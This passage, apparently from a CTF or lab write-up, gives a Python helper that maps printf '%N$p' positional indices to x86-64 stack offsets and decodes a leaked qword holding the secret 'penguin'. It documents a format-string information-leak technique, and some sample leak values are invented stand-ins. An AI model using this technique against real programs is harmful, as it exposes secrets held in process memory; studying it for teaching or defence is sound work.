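notebook. Python 3 (int.to_bytes), unlike the notebook's Python 2 kernel.
"""
import re

# x86-64 SysV calling convention: rdi carries printf's format string, the next
# five variadic slots are read from rsi, rdx, rcx, r8, r9, and slot 6 onwards
# comes from the stack starting at the caller's rsp.
REGISTER_SLOTS = 5
QWORD = 8

# Constructed index -> "%N$p" output map. Slots 1-5 are the register values in
# the notebook's `dr` dump, slot 9 is the leaked "\0penguin" qword; slots 6-8
# are invented stand-ins (assumption: the binary is not run here).
SAMPLE_LEAKS = {
    1: "0x1",                 # rsi
    2: "(nil)",               # rdx == 0, glibc prints NULL pointers as (nil)
    3: "0x7f3bc0ed28a0",      # rcx
    4: "0x4",                 # r8
    5: "0x7f3bc1207d80",      # r9
    6: "0x7ffcf638f790",      # [rsp]      stand-in
    7: "0x2",                 # [rsp+0x08] stand-in
    8: "0x4004c0",            # [rsp+0x10] stand-in
    9: "0x6e6975676e657000",  # [rsp+0x18] little-endian "\0penguin"
}

_PTR_RE = re.compile(r"0x([0-9a-fA-F]{1,16})\Z")


def stack_offset_to_index(offset):
    """%N$p index that reads the qword at rsp+offset (offset in bytes)."""
    if offset < 0 or offset % QWORD:
        raise ValueError("offset must be a non-negative multiple of 8")
    return REGISTER_SLOTS + 1 + offset // QWORD


def index_to_stack_offset(index):
    """Inverse mapping; None when the slot is held in a register."""
    if index < 1:
        raise ValueError("positional indices start at 1")
    if index <= REGISTER_SLOTS:
        return None
    return (index - REGISTER_SLOTS - 1) * QWORD


def decode_pointer_leak(text, width=QWORD):
    """Bytes of the leaked slot in memory order.

    %p prints the slot as a number, most significant digit first, which on a
    little-endian machine is the reverse of memory order. Parsing the number
    and re-serialising it little-endian also copes with "(nil)" and with
    values whose leading zero nibbles give an odd digit count, the two cases
    a bare unhexlify of the printed text rejects.
    """
    text = text.strip()
    if text == "(nil)":
        value = 0
    else:
        match = _PTR_RE.match(text)
        if match is None:
            raise ValueError("not a %p leak: {!r}".format(text))
        value = int(match.group(1), 16)
    return value.to_bytes(width, "little")


def recover_string(text):
    """Printable secret from one leaked slot, NUL padding stripped."""
    return decode_pointer_leak(text).strip(b"\x00").decode("latin-1")


def locate_secret(leaks, marker):
    """Replay the %i$p sweep over an index -> leak map.

    Returns (index, stack_offset) of the first slot whose in-memory bytes
    contain `marker`; stack_offset is None for register-held slots.
    """
    for index in sorted(leaks):
        if marker in decode_pointer_leak(leaks[index]):
            return index, index_to_stack_offset(index)
    return None


if __name__ == "__main__":
    hit = locate_secret(SAMPLE_LEAKS, b"penguin")
    print("secret in slot %d at rsp+0x%x" % hit)
    print(recover_string(SAMPLE_LEAKS[hit[0]]))
```

The five-register rule is specific to x86-64 SysV; on 32-bit x86 every argument is passed on the stack, so `%1$p` already reads a stack slot and the index has to be re-derived by sweeping rather than computed from this table.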